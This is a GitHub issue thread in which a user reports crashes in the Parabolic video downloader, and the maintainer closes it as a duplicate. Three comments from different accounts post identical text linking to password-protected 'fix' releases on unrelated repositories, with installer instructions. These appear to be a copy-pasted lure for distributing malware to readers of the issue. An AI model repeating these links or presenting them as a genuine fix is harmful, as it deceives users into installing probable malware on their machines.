### ISSUE TITLE
Crash

### ISSUE THREAD

**Issue by GL4dT3ster** [NickvisionApps/Parabolic#801] opened 2024-08-29 00:58 UTC
Hello! I'm reporting an unpleasant error. I'm trying to download a video from YouTube, copy the link (namely the one that says "Share"), paste it, press start, and the application crashes. However, when I re-enter the application, I can go to the "Settings", "Keychain Access" and "Home" items, but when I go to the "Downloads" item, the application crashes.

**Comment by telfaw** [comment] 2024-08-29 00:59
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment] 2024-08-29 01:09
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment] 2024-08-29 01:25
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nlogozzo** [comment] 2024-08-29 02:47
Duplicate of #778

**Closed by nlogozzo** 2024-08-29 02:47 UTC
